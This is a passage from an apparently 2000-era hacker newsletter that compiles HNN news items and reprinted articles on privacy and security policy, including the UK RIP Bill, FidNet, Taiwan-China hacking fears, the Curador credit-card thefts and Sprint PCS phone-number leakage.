      information, knowing that it would eventually be stored in the centralized data bank. 

      The government has allayed those fears somewhat by allowing citizens to opt out of
      the genealogical data base. So far, only about 5 percent of Icelanders have chosen not
      to participate. 

      Other critics are confident the project will fail because, they say, so many doctors are
      against it. They're predicting physicians will refuse to comply with the law that
      requires them to deliver new data to the genetic data bank. 

      Stefansson, a former Harvard professor, offered his own explanation why Iceland
      should support the experiment. 

      "Recognize that knowledge is never evil in of itself," he said. "If you run the world by
      forbidding new discoveries, you are controlling the world in an unpredictable manner.
      You are putting yourself in the position of God." 

      Correspondent Jerrold Kessell contributed to this report.
      
      @HWA
      
129.0 HNN:Mar 6th: Clinton Says No To Email 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by richardm 
      When asked if he talked with his daughter Chelsea via
      Email while she was in college, US President Bill Clinton
      replied "I don't do e-mail with Chelsea, Absolutely not --
      I don't think it's secure." (Evidently online privacy
      carries a little more weight with Bill than I thought.) 

      San Jose Mercury News       
      http://www.mercurycenter.com/business/top/047783.htm
                                                          

      Posted at 10:33 p.m. PST Friday, March 3, 2000 

      `I don't do e-mail with Chelsea'

      BY DAN GILLMOR
      Mercury News Technology Columnist 

      All over America, parents exchange e-mail with their children when the
      kids head off to college. Meet one parent who doesn't: Bill Clinton.

      ``I don't do e-mail with Chelsea,'' the president said after a speech
      Friday. ``Absolutely not -- I don't think it's secure.''

      That's a shame for the first family, which is clearly in a category by
      itself when it comes to security. But in an odd way, the rest of us can
      draw some comfort from Clinton's worries. When online privacy
      becomes a personal issue for the president of the United States, maybe
      we're closer to a day when privacy will reach the position it deserves
      on the public agenda.

      Clinton elevated the subject in his remarks to the Aspen Institute's
      Forum on Communications & Society, which met in San Jose on
      Friday. He spoke of the genuine, justified angst gnawing at regular folks
      who don't trust businesses and governments to keep their most personal
      information private.

      Trust is earned in this world. There are some responsible members of
      the online community, companies and sites that go to great lengths to
      protect the privacy of Web surfers and shoppers. But the bad actors,
      who troll for personal information so they can manipulate and trade it,
      mock the self-regulation so many in the Net community say is the
      answer.

      So when Clinton called -- albeit tentatively -- for laws protecting the
      privacy of individuals' online medical and financial information, as well
      as all children's activities, he surely struck a resonant chord with
      average people.

      A zone of privacy is central to the American way of life, he said with
      absolute accuracy, ``and we give it up at our peril.''

      Welcome words. But they come in a context that invites some
      skepticism.

      The Clintons could enjoy an entirely private e-mail correspondence right
      now. They'd need to use strong encryption, the scrambling of data so
      that it can't be understood even if intercepted. But this president, taking
      the advice of law enforcers and spies, has done everything in his power
      to discourage the widespread use of strong encryption. He constantly
      uses strong encryption in his voice and data communications with
      military officials, no doubt, but the fact that he apparently hasn't even
      considered it for family e-mail is testament to the government's
      paranoia that regular folks, not just criminals, might truly protect their
      own privacy in this way.

      His other problem is part technical and part social. The president would
      have to trust that someone wasn't reading his daughter's e-mail once it
      had been unscrambled on her computer, either over her shoulder or by
      jacking into that computer through the network to which it's attached.

      He surely trusts his daughter. But as he also noted in his speech Friday,
      it's unclear whether any of us can trust the network. The tech industry
      has some distance to travel in that direction.

      The administration has also been tone-deaf -- and that's a charitable
      description -- to civil liberties. This president and his top appointees
      have again and again supported legislation that has eroded the Bill of
      Rights and other fundamental liberties.

      In the privacy arena, too, the Clinton team has been less than faithful to
      the notions the president floated on Friday. When it issued regulations
      about the privacy of medical records last fall, the administration talked a
      great game. But the fine print didn't match the rhetoric. 

      The White House record on financial data doesn't give privacy
      advocates the warm and fuzzies, either. It has, for example, carried
      water for big business by lobbying against the European Union's worthy
      efforts to apply its data-privacy laws to American companies doing
      business in Europe. Meanwhile, the administration has been the chief
      cheerleader for the discredited notion that industry can regulate itself on
      these matters.

      Clinton offered a politician's hedge even as he pushed privacy. We
      don't want to kill the golden goose of technology, he said, implying that
      ensuring privacy rights could be so bad for business that we might have
      to abandon the idea.

      That said, there was genuine progress in Clinton's words Friday, a day
      after DoubleClick Inc., the Internet-advertising company, loudly
      postponed plans to expand its business in ways that amounted to
      unprecedented surveillance of individual Web users. I wonder if the
      timing was entirely a coincidence.

      The president's chief achievement Friday was to put the issue in the
      context of real people -- that is, real voters whose worries become the
      worries of politicians who want to be elected or re-elected. Even in an
      era when ``one person, one vote'' has morphed toward the sickening
      notion of ``one dollar, one vote'' the concerns of real people do matter.

      Let's assume the administration will push the right kind of laws. Will
      Congress act? I asked him that question after the speech.

      ``I kind of think we'll get legislation this year,'' Clinton said.


      Dan Gillmor's column appears each Sunday, Tuesday and Friday.
      Visit Dan's online column, eJournal
      (weblog.mercurycenter.com/ejournal). E-mail:
      dgillmor@sjmercury.com; phone (408) 920-5016; fax (408)
      920-5917. PGP fingerprint: FE68 46C9 80C9 BC6E 3DD0 BE57
      AD49 1487 CEDC 5C14.
      
      @HWA

130.0 HNN:Mar 7th:FidNet is Not Enough 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      Testifying before the Senate Governmental Affairs
      Committee Government and Defense Information
      Systems Director Jack Brock, said that the NIPC plan of
      a Federal Intrusion Detection Network is flawed. He
      went on to say that good security is a direct result of
      good information management and that band aid
      solutions such as FidNet will fail unless management is
      fixed. 

      The Register UK 
      http://www.theregister.co.uk/000306-000025.html
      
 
      SATURDAY MARCH 11TH 2000  

      Posted 06/03/2000 8:44pm by Thomas C. Greene in Washington

      Congressional study rejects Clinton's IT security Czar, FIDNET

      The President's scheme to bolster US government computer security by 
      appointing an information security Czar, and developing an automated 
      monitoring system to expand intrusion detection known as FIDNET, is 
      misguided, General Accounting Office (GAO) Government and Defence 
      Information Systems Director Jack Brock told Congress last week. 

      "The specific criticism we have of the President's plan is that it focuses 
      so much on intrusion detection you begin to get the impression that it was 
      the primary means they have of improving the federal government's computer 
      security programme," Brock said in testimony before the Senate 
      Governmental Affairs Committee. 

      The GAO is an investigative body which reviews and audits the federal 
      bureaucracy on behalf of Congress. It recently looked into computer and 
      information security procedures in numerous government bureaus. 

      The investigation revealed widespread security failures, most of which 
      derive from poor management. One doesn't find an agency with good 
      information management and bad security, just as one never sees an agency 
      with poor management and good security, Brock observed. 

      Allowing the Clinton Administration to address computer security as an 
      individual element of federal information management would be a mistake, 
      he insisted. Intrusion detection alone will do nothing to prevent data 
      security being compromised in the first place. A far more holistic 
      approach is needed, Brock believes. 

      "One agency that we've gone to at [the Environmental Protection Agency] 
      did a pretty good job of reporting and recording intrusions; but they did 
      a very bad job of doing anything to prevent those intrusions, or analyzing 
      those intrusions to take corrective action," Brock recalled. 

      In spite of the GAO's wisdom, the President last week ordered a review of 
      every federal agency to determine their vulnerability to cyber attack, 
      which will be administered by White House Chief of Staff John Podesta. The 
      prevention of distributed denial of service (DDoS) attacks "to make sure 
      that federal computers cannot be used by outsiders to attack others" would 
      be a priority, Clinton said. 

      The Clinton Administration appears to be indulging federal law enforcement 
      agencies which prefer an emphasis on intrusion detection and response, 
      simply because it assures them an increasingly prominent role in national 
      cyber security matters. 

      Obviously, if intrusion prevention were to improve dramatically, the 
      Department of Justice (DoJ), the FBI, and the National Infrastructure 
      Protection Center (NIPC) would have less justification to muck about in 
      cyberspace. 

      This would result in some reduction of bargaining power to attract federal 
      funds for cyber crime initiatives, to obtain expanded powers of 
      surveillance on line, and to reduce opportunities for Netizens to surf the 
      Web in complete anonymity, all of which are among the DoJ's highest 
      priorities right now. 

      The Register foresees little trouble for the DoJ in realising its 
      ambitions, however. Having observed the pace of common-sense innovation 
      among US government bureaus for several years now, we make it a safe bet 
      that a significant erosion of on-line privacy and liberties will have 
      taken place long before Uncle Sam stops making network intrusions a matter 
      of child's play.  
      
      @HWA
      
131.0 HNN:Mar 7th: RIP Bill Comes Under Fire In UK 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Lady Sharrow 
      The latest phase of making the UK the most tightly
      regulated country in the world takes place today. If
      enacted the Regulation of Investigatory Powers (RIP) Bill
      would give far reaching powers to the government and
      its agencies to snoop on private individuals. All UK
      readers are urged to lobby their MP's to retract this bill
      and implement the original freedom of information bill the
      government promised. 

      The Register UK
      http://www.theregister.co.uk/000306-000020.html
      
      Wired
      http://www.wired.com/news/politics/0,1283,34776,00.html
      
      The Stand - Campaigning For Safe E-Commerce Legislation
      http://www.stand.org.uk/
      
      Posted 06/03/2000 4:39pm by Tim Richardson

      Opposition mounts against UK's Big Brother Bill

      Parliament is today debating plans which will massively extend Government 
      snooping powers in Britain. 

      If adopted, the Regulation of Investigatory Powers (RIP) Bill would give 
      the Government the green light to snoop on private emails and mobile phone 
      conversations. 

      Those backing the Bill say the new measures simply bring new communication 
      technologies in line with regulations governing traditional telephony 
      services. 

      STAND.org.uk e-democracy campaigner Danny O'Brien said: "This Bill 
      contains ill-conceived proposals that will seriously damage UK ecommerce, 
      as well as threaten some basic civil liberties. 

      "Since the Government is trying to rush this legislation through 
      Parliament, we decided to use the Internet to speed up our campaign to 
      amend the worst bits of the Bill," he said. 

      STAND.org.uk has set up a WebFax service to enable Net users to lobby 
      their MP against the Bill. Follow the link above and you can participate 
      in this exercise in mass democracy. 

      Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties (UK), said: "The 
      RIP Bill is complex in nature and with its current state, there remains 
      serious problems with its compatibility with the Human Rights Act 1998. 

      "If enacted in its current form, it would only establish an intimidating 
      environment for the legitimate use of encryption products by the UK 
      citizens. 

      "Such legislation would no longer be compatible with the government policy 
      to make Britain the best place for ecommerce and network development. The 
      RIP Bill would be the first step towards the creation of a very hostile 
      place for network development. 

      "We cannot support such proposals, which we believe would be a serious 
      curtailment of important and well-established civil rights," he said. 

      Today the House of Commons is engaged in the second reading of the RIP 
      Bill. The Government hopes it will become an Act by October 2000.  

       
      -=-
      
      Wired; 
      
      
      U.K. Crypto Law a Key Issue 
      by Alan Docherty 
      
      3:00 a.m. 7.Mar.2000 PST 
      LONDON -- Law enforcement officials speaking to the House of Commons said
      criminals were using the Internet and without new powers those crimes 
      would go undetected by police. 
      
      Their comments came Monday as home secretary Jack Straw announced the second
      reading of the Regulation of Investigatory Powers Bill. The measure would 
      update legislation and give more power to law enforcement agencies to
      intercept electronic communications. 
      
      Opponents claimed specific sections of the updated legislation made users 
      guilty until proven innocent. 
      
      Opposition speaker Ann Widdecombe, shadow home secretary, said the bill 
      had good parts and the Conservative Party accepted the need to regulate 
      surveillance. 
      
      However, Section 49 of the bill was, considered unacceptable by Widdecombe
      and many others. The section enables law enforcement agencies to serve 
      notices demanding that intercepted emails be decrypted. The bill puts the onus
      on Net users to prove they do not have the key or have lost it. 
      
      Simon Hughes, health and social welfare spokesman for the Liberal Democrats, 
      also supported the need for a new bill, but asked that the legislation have a
      more even balance between the power and rights of the state and the power
      and liberties of individuals. He said that in the current bill the government
      had gone too far. 
      
      Widdecombe said she thought the bill was "probably in breach of the ECHR 
      (European Convention of Human Rights)." 
      
      Yaman Akdeniz, director of Cyber Rights & Cyber Liberties agreed the bill was
      likely to breach the ECHR and that unless it was changed, it would make the 
      UK an undesirable location for e-commerce. The Labour government has set the
      target of making the UK the best environment for electronic business by 2002. 
      
      Caspar Bowden of the Foundation for Information Policy Research was hopeful 
      the Home Office would consider the arguments from opposition and back bench 
      Labour MPs. 
      
      "Government was clearly surprised by the breadth and force of objections to 
      the structure and details of almost every part of the bill," Bowden said. "We
      will have to see whether they respond positively to these powerfully expressed
      criticisms during the amendment phase." 
      
      Internet Freedom's Chris Ellison was less hopeful. 
      
      "The RIP Bill does nothing to regulate the powers of the police. Rather it 
      extends them," he said. "The real victims will not be criminals who become Net
      users, but Net users who will become criminals as a consequence of the removal
      of their presumed innocence." 
      
      @HWA
      
      
132.0 HNN:Mar 7th:Curador Returns With More CC Numbers 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Claiming he has been on vacation for the past week or
      so Curador has returned and now boasts more than
      23,000 credit card numbers that have been lifted from
      at least eight different e-commerce sites. At several of
      the sites Curador has used a security hole in Microsoft's
      Internet Information Server software which allows the
      download of customer transaction records. Microsoft
      created a patch for the hole in 1998. 

      USA Today 
      http://www.usatoday.com/life/cyber/tech/cth502.htm
      <article vanished!>
      
      @HWA
      
133.0 HNN:Mar 7th:Taiwan Fears Computer Attack From China 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The head of Taiwan's National Security Bureau
      information division, Chang Kuang-yuan, said that while
      there was no evidence of a planned attack, the island's
      computers should be well protected for such an
      eventuality. It is feared that China may attempt to
      disrupt Taiwan's March 18 presidential election with
      various cyber attacks. 

      Virtual China
      http://www.virtualchina.com/news/mar00/030700-hacker-alo-jsl.html
      
      Reuters - via Yahoo      
      http://dailynews.yahoo.com/h/nm/20000307/wr/taiwan_internet_1.html
      
      
      VC;
      
      Taiwan Warns of Possible Computer War with Mainland

      By ALEXA OLESEN

      (Virtual China News -- Mar. 7) As China continued to sabre rattle in the
      run-up to Taiwan's second democratic elections, scheduled for Mar. 18, a
      Taiwanese official warned Monday that the island's computer systems may be
      at risk of being attacked by mainland Chinese hackers.

      Chang Kuang-yuan, head of Taiwan's National Security Bureau information
      division said that while there was no evidence of a planned attack, the
      island's computers should be well protected for such an eventuality.

      "No hacking at the moment does not suggest the possibility should be ruled
      out," Chang was quoted as saying by the Agence France Presse.

      Cross-Strait hacking fears were made a reality last fall when hundreds of
      attacks on Taiwanese computers were traced to computers on the mainland.
      The attacks ranged from sabotage, through the introduction of computer
      viruses, to the alteration of Web site content. Some were instigated by
      comments made by Taiwanese President Lee Teng-hui's calling for a
      state-to-state relationship between China and Taiwan.

      Taiwanese hackers responded in kind by hacking into mainland Chinese sites
      and posting the Taiwanese anthem and the Taiwanese flag.

      Chang told the press last year that the Taiwanese National Security Bureau
      had discovered 165 mainland Chinese Web sites as the sources of 72,000
      instances of hacking following Lee Teng-hui's comments. Victims of the
      attacks included Taiwanese government agencies such as the Pingtung
      County government Web site and the Construction and Planning
      Administration, as well as the Web sites of several universities.

      While some of those Web sites were government-operated it was unclear
      whether or not the hack attacks were orchestrated by the Chinese
      government or individual hackers according to Chang. 

      Playful Individuals

      "I think this is more of a side show than actual strategy on the part of
      mainland," said Stephen Yates, Senior Policy Analyst at the Heritage
      Foundation, a U.S. think-tank. "Recent hacking incidents are probably the
      work of playful individuals ... very intelligent and creative college students
      similar to the kind of people who would hack into a Pentagon Web site and put
      up 'No Nukes'," Yates said.

      Media reports, pro-Taiwan forces in the U.S., and Taiwanese officials have
      stressed Beijing's role in the hack attacks because they were traced to
      mainland computers and seemed to be conducted en masse. Observers also
      reason that because mainland China so closely regulates and monitors its
      computer network activity only government-sanctioned hackers would be able
      to accomplish Cross-Strait computer sabotage.

      However Chinese military expert James Mulvenon says that argument is
      seriously flawed and that anyone in China with computer access and the
      technical know-how could easily accomplish last August's hacking.

      "I've been in cybercafes in China. They don't enforce any regulation on
      registration," said Mulvenon, an associate political scientist at the Rand
      Corporation, another U.S. think-tank. "There are hacker tools sitting on the
      [computer] desktop and illegal proxy servers already installed. The network
      environment is wide open. It's not well controlled," he said.

      Heightened Awareness

      Experts say that hack attacks should be distinguished from Cross-Strait
      Information Warfare contingencies that both Taiwan and China are preparing
      for. Information Warfare is the offensive and defensive use of information and
      information systems to deny, exploit, corrupt, or destroy, an adversary's
      information, information-based processes, information systems, and
      computer-based networks while protecting one's own, according to Ivan K.
      Goldberg, the Director of the Institute for the Advanced Study of Information
      Warfare (IASIW).

      Chinese military officials have begun to regularly refer to the need for network
      security and recent regulations regarding the transmission of state secrets
      evidenced a heightened awareness to network computer espionage. Taiwan
      also has made similar statements.

      "China has put a lot of effort into building up its information capabilities in the
      past decade," Lin Ching-ching, the director of Taiwan's Electronic
      Communications and Information Bureau told reporters last August. "But
      Taiwan is also working on it. We are not as fragile as many people think," he
      said. 

      Taiwan's response to the August hack attacks was decidedly military in
      nature, despite the fact that there was no evidence that Beijing was behind
      them. In September, Taipei announced that it was stepping up its military
      training to better defend itself against any electronic warfare by China.

      The Taiwanese defense ministry went so far as to institute nine seminars
      focused on communication security and computer virus prevention.

      High Risk, Low Gain

      However, hacking is different from that level of Information Warfare.

      "There are no doubt real plans to make [computer network infiltration] an
      operational capability on both sides, but neither would want to demonstrate
      that capability. There is no incentive for them to show their hand," said
      Stephen Yates.

      Mulvenon echoed Yates' argument and added that not only would China be
      reluctant to show its cards but that it would also be tough for Beijing, as it
      would be for others, to have a very strong hand regarding Information
      Warfare.

      "People talk very glibly about Information Warfare against Taiwan but it's
      enormously difficult," Mulvenon said. "It's high risk and low gain, with a high
      blowback potential if it fails or you get caught. I would think they would feel
      more comfortable with ballistic missiles."

      Mulvenon did not fully discount Beijing's role in cross-Strait hacking, however.
      Admitting that there was no direct evidence indicating that the hack attacks
      were planned by the Chinese central government, he suggested that they
      could have been used as a handy diversion

      "A reasonable hypothesis is that Beijing exploited teenage hooliganism by using
      that as a cover for carrying out interesting intelligence gathering," said
      Mulvenon.

      Taiwan, which split from the mainland in 1949 following a civil war is
      considered by Beijing to be a renegade province. Current mainland Chinese
      policy dictates that any moves by Taiwan toward being recognized
      internationally as an Independent nation will be countered with military attack.

      To reach Alexa Olesen: alexa@virtualchina.net
                
       -=-
                                                                  
       Reuters;
                                                                  
       Tuesday March 7 5:01 AM ET 

       Taiwan Says Ready If China Launches Internet Attack

       TAIPEI, Taiwan (Reuters) - Taiwan's military said on Tuesday it has set 
       up Internet defenses in the run up to the March 18 presidential election 
       after discovering more than 7,000 attempts by Chinese hackers to enter 
       the country's        security systems.

       ``We have set up a round-the-clock monitor system and installed various 
       security programs and firewalls to keep the Chinese Communists from 
       trying to disrupt our networks,'' said Chang Chia-sheng, the defense 
       ministry's cyber        information head.

       The military and security networks are independent with no links to the 
       Internet, making it difficult for Chinese hackers to sabotage, Chang 
       said.

       Taiwan's security authorities have discovered more than 7,000 recent 
       attempts by Chinese hackers to enter the island's security and military 
       systems through Internet Web sites, Chang said. He did not elaborate.

       A cyberwar between Taiwan and Chinese hackers broke out last year after 
       Taiwan President Lee Teng-hui called in July for bilateral ties to be 
       conducted on a ``special state-to-state'' basis, infuriating Beijing.

       China has heaped verbal threats, including Internet propaganda, in a 
       veiled warning against voting for pro-independence opposition candidate 
       Chen Shui-bian in the elections.

       Chang said China was technically capable of paralyzing the island's 
       computer networks, including the system at the vote tabulation center on 
       election day, if it wanted to disrupt the polls, but said such a move 
       would be difficult.

       ``Theoretically, it is possible, but it won't be easy,'' Chang said.

       China could swamp Taiwan government Web sites with huge megabytes of 
       electronic mail or e-mail bombs to overload them, he said.

       ``But we can always refuse access to our Web sites from any suspicious 
       Internet providers once we discover unusual access movements,'' Chang 
       said.

       Besides, Chang noted, Taiwan's vote tabulation network was independent of 
       the Web site of the Central Election Commission, making it difficult for 
       hackers to use the Web site to attack the vote network.

       Beijing regards Taiwan as a wayward province and has threatened to invade
       if the island declares independence. 
       
       @HWA
      
      
134.0 HNN:Mar 7th:Hong Kong Beefs Up Online Police Presence 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The Police Training School in Hong Kong has started
      teaching police officers how to fight computer crime.
      The Commercial Crime Bureau will increase staff of the
      computer crime section from 17 officers to at least 20
      and each of the 45 police divisions will have at least one
      computer crime trained officer assigned. 

      South China Morning Post       
      http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000306014052057.asp
      


      Monday, March 6, 2000
                             
      Police step up war on cyber crime
 
      MICHAEL WONG 
 
      At least one officer with computer-crime knowledge is to
      be drafted to each of the 45 police divisions as the
      problem grows. 
 
      The Police Training School has started teaching trainee
      constables and inspectors how to fight computer crime. 
 
      The computer-crime section of the Commercial Crime
      Bureau will increase staff from 17 officers to at least 20. 
 
      With Internet use growing worldwide, the force needed
      to improve its ability to counter computer crime, said
      bureau Senior Superintendent Peter Else. 
 
      Figures from the Office of the Telecommunications
      Authority show that the estimated number of Internet
      accounts grew from a little more than one million in June
      last year to 1.86 million by the year's end. 
 
      The number of computer crimes grew from 25 in 1997 to
      38 in 1998 and 266 last year. 
 
      These crimes included unauthorised access, Internet
      shopping fraud, publication of obscene material and
      criminal damage. 
 
      The bureau received 84 requests for computer forensic
      examination last year, up from 60 in 1998. 
 
      Mr Else said other types of computer crime such as
      criminal intimidation and "pump and dump" were
      emerging fast. 
 
      In "pump and dump", so far detected mainly in the United
      States, criminals buy junk bonds and shell companies'
      stocks at a minimal price and persuade Web site visitors
      to purchase them. 
 
      "Once their value has gone up, the criminals sell their
      own stocks for a profit," he said. 
 
      Since most crimes on the Internet could also be
      committed in the "real world", users must use the same
      degree of alertness in the cyber-world, said Mr Else. 
 
      With greater awareness and understanding, particularly
      by courts, about the seriousness of the problem, Hong
      Kong was in a position to tackle computer crime, he said.
 
      Through regular meetings with the Department of Justice,
      heavier penalties have been handed out in court cases. 
 
      "The courts have shown already that other legislation
      applies on the Internet as well," he said. "And, secondly,
      they're more than happy to give some fairly hefty
      sentences." 
      
      @HWA
      
135.0 HNN:Mar 7th:ATM and Frame Relay Vulnerable to Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The Yankee group has said that ATM and Frame Relay
      Networks are extremely vulnerable to security breaches.
      ASPs, network carriers and other corporations will spend
      $60 and $500 million between now and 2004 to add
      encryption to their networks. 

      TechWeb 
      http://www.techweb.com/wire/story/TWB20000306S0005
      
      ATM, Frame Relay Data Networks Insecure
      
      (03/06/00, 12:07 p.m. ET) TechWeb 

      ATM and frame relay data networks are highly
      vulnerable to security breaches, researcher
      Yankee Group said Monday. ATM and
      frame-relay data network carriers, application
      service providers and hosting providers, and
      corporations will spend $60 million this year
      and up to $500 million globally in 2004 to add
      encrypting hardware and software to
      counteract transport security threats. 
      
      @HWA      
      
      Briliant! (Do these people get paid??) - Ed
      
      
      
136.0 HNN:Mar 8th:EFF Looking For Lawyers For DeCSS Case 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The Motion Picture Association has retained the
      services of the prestigious New York law firm of
      Proskauer Rose to handle its side of the DVD DeCSS
      case. The Electronic Frontier Foundation is still
      searching for a New York based firm that will handle the
      case without breaking the bank. The EFF is attempting
      to use 'open law' as one alternative but is having little
      success. 

      Wired       
      http://www.wired.com/news/politics/0,1283,34720,00.html
      
      
      U.S. Wants to Trace Net Users by Declan McCullagh 

      3:00 a.m. 4.Mar.2000 PST       WASHINGTON -- The ease of hiding one's 
      identity on the Net is giving police migraines and justifies providing 
      broad new powers to law enforcement, the White House says in a forthcoming 
      report. 

      The federal government should take steps to improve online traceability 
      and promote international cooperation to identify Internet users, 
      according to a draft of the report commissioned by President Clinton and 
      obtained by Wired       News. 

      Police should be able to determine the source of hacker attacks or 
      "anonymous emails that contain bomb threats," states the 200 KB document 
      prepared by a high-level working group chaired by Attorney General Janet 
      Reno. 

      Although the report was largely complete before last month's prominent 
      denial-of-service attacks, it will likely influence the debate over how 
      the U.S. government should respond to them. 

      The FBI has not made any arrests during its investigation, and bureau 
      officials Tuesday told Congress that anonymity and the global nature of 
      the Internet pose serious problems. 

      A White House spokesman said the report is being finalized and "should be 
      released very soon." 

      The Working Group on Unlawful Conduct on the Internet, which Clinton 
      created in August 1999 to consider new laws or educational programs, 
      includes senior administration officials such as FBI Director Louis Freeh, 
      Treasury Secretary       Larry Summers, Commerce Secretary William Daley, 
      and representatives from the military, DEA, and Secret Service. 

      The group focused on what it views as the problem of anonymity, citing 
      "the need for real-time tracing of Internet communications across 
      traditional jurisdictional boundaries, both domestically and 
      internationally [and] the need to       track down sophisticated users who 
      commit unlawful acts on the Internet while hiding their identities," 
      according to the report. 

      Currently no laws require Internet users in the United States to reveal 
      their identities before signing up for accounts, and both fee-based and 
      free services offer anonymous mail, Web browsing, and dialup connections. 

      Internet service providers should be encouraged, though not required, to 
      maintain detailed records of what their users are doing online. "Some 
      industry members may not retain certain system data long enough to permit 
      law       enforcement to identify online offenders," the report says. 

      But providing police with increased abilities to trace users raises thorny 
      legal and technical questions, and civil libertarians on Friday questioned 
      whether it would violate privacy rights protected by the Constitution. 

      A 1995 Supreme Court decision, McIntyre v. Ohio Elections Commission, 
      upheld a right to anonymous political speech.       "This is the nutty 
      kind of stuff that's produced by people who meet in closed rooms without 
      windows," said Marc Rotenberg, director of the Electronic Privacy 
      Information Center. 

      David Banisar, co-author of The Electronic Privacy Papers, said the 
      administration unwisely "wants to make it easier to obtain people's 
      identities, trace their movements online, and apply wiretapping to the 
      Internet." 

      The report says anonymous remailers can be used to protect the privacy of 
      dissidents in oppressive countries, but also can frustrate police who 
      can't figure out who sent the message. 

      "To be sure, individuals can generally engage in many 'real world' 
      activities relatively anonymously, such as making small cash payments and 
      attending public events. But they cannot remain anonymous in other 
      contexts, such as       opening a bank account or registering a car," the 
      report says. "Indeed, many financial institutions have substantial 
      customer identification requirements." 

      Response to the proposal among House Republican leaders was cautious. 

      "We need to make sure this isn't used as an excuse to set up a big brother 
      monitoring program. 'Real-time tracing of Internet communications' sounds 
      an awful lot like a proposal to put backdoors in the latest revision of 
      the Internet       protocol itself," said Richard Diamond, a spokesman for 
      House Majority Leader Dick Armey. 

      "Obviously we need to be able to track down those who would use the 
      Internet to commit crimes, just as if they had used a telephone to do the 
      same," he said. "Let's just keep things in perspective." 

      The White House report cites the PairGain case, in which a stock 
      manipulator posted a fraudulent Bloomberg article in an attempt to drive 
      the company's share prices up. 

      The report also says that Congress should consider approving a law to 
      remove some privacy protections from journalists and publishers. "With the 
      advent of the Internet and widespread computer use, almost any computer 
      can be used       to 'publish' material," says the draft document, which 
      also recommends reduced privacy rights for cable modem users. 

      During a White House summit with industry leaders last month, Clinton 
      denounced the recent denial-of-service attacks but cautioned against 
      overreaction. 

      The FBI and Justice Department have long opposed untraceable Internet use. 

      "I think we are perilously close to a lose-lose situation in which 
      citizens have lost their privacy to commercial interests and criminals 
      have easy access to absolute anonymity," Justice Department prosecutor 
      Philip Reitinger said on an       MIT panel last April, according to The 
      New York Times. 

      The FBI's Freeh told Congress much the same thing when he testified 
      during an appropriations hearing last year. 
      
      @HWA
      

137.0 HNN:Mar 8th:Cell Surfing Not Anonymous Either 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Wireless Internet is the hot new feature in cell phone
      technology but some companies may be violating users
      privacy. Sprint PCS and possibly other companies embed
      users phone numbers inside the request for every page
      viewed. Sprint says that the use of phone numbers in
      this manner is clearly spelled out in its license
      agreement. (Look at the fine print, It's Huge!) 

      SF Gate 
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/07/BU94577.DTL
      
      
      Concern Over Cell Surfing
      Sprint phone reveals number to Web sites 

      Todd Wallack, Chronicle Staff Writer 
                                              
      Tuesday, March 7, 2000 

      Kevin Manley has no problem giving his name and
      address to Web sites like Amazon.com when he
      needs to buy a book. But Manley, a Seattle software
      developer, was stunned to discover recently that his
      Sprint PCS cell telephone automatically transmits his
      phone number to every Web site he visits using
      Sprint's new wireless data service. 

      ``I was surprised,'' Manley said. ``If I'm just surfing
      the Web without purchasing something, I expect to
      remain anonymous.'' 

      Manley isn't alone. It turns out that Sprint PCS, and
      possibly some other wireless companies, routinely
      embed customers' phone numbers in Web page
      requests, raising concerns about whether these
      companies are doing enough to safeguard users'
      privacy. 

      ``People don't want to be automatically identified in
      cyberspace, any more than they want to wear
      bar-coded name tags as they walk down a city
      street,'' said Jason Catlett, president of JunkBusters,
      an anti-marketing group. 

      Privacy advocates said they worried that Web sites
      could potentially forward users' cell phone numbers
      to their sales department for follow-up calls. Or
      dot-com companies could use databases to match
      surfers' phone numbers with their name, address and
      other personal information. 

      ``Just what we all need, more telemarketers calling
      us!'' said Richard Smith, a Massachusetts
      programmer who first verified that Manley's problem
      affects other Sprint PCS customers. 

      Although relatively few customers now use cell
      phones to surf the Web, the issue could become
      increasingly important as millions of Americans take
      advantage of the technology in coming years. Sprint
      just started its service in the United States in
      September and other major carriers like Bell Atlantic
      and AirTouch Communications have since followed
      suit. AT&T has been tinkering with the technology
      for several years, though it's only recently targeted
      the mass market. 

      But Sprint PCS spokesman Tom Murphy
      downplayed the privacy fears. He pointed out that
      users routinely hand personal information to online
      retailers when they buy a book or plane ticket. Those
      Web sites can then instantly recognize users when
      they return by depositing a small file on users' hard
      drive called a ``cookie.'' 

      In addition, Sprint said it notifies customers that their
      phone numbers will be sent to Web sites in its service
      agreement, posted on its Web site. But Manley
      complained that the sentence is buried in the nearly
      6,000-word document. He said he only happened
      upon the problem while trying to figure out how the
      cell phone worked, using it to surf his own Web
      server and then analyzing Web page requests. 

      It's also possible that other phone companies'
      customers are affected by the privacy hole. 

      That's because most of Sprint's rivals use the same
      microbrowser, developed by Redwood City's
      Phone.com, which boils down Web sites so they can
      be read through a cell phone's tiny screen. 

      Because of the way the software works, Phone.com
      requires wireless companies to use a unique ID
      number for each user when they request a Web
      page. For obvious reasons, the phone number is the
      simplest to use. 

      But Ben Linder, Phone.com's marketing vice
      president, said it recommends phone companies alter
      the phone number in some way so Web sites can't
      use the number to call or identify surfers. Indeed,
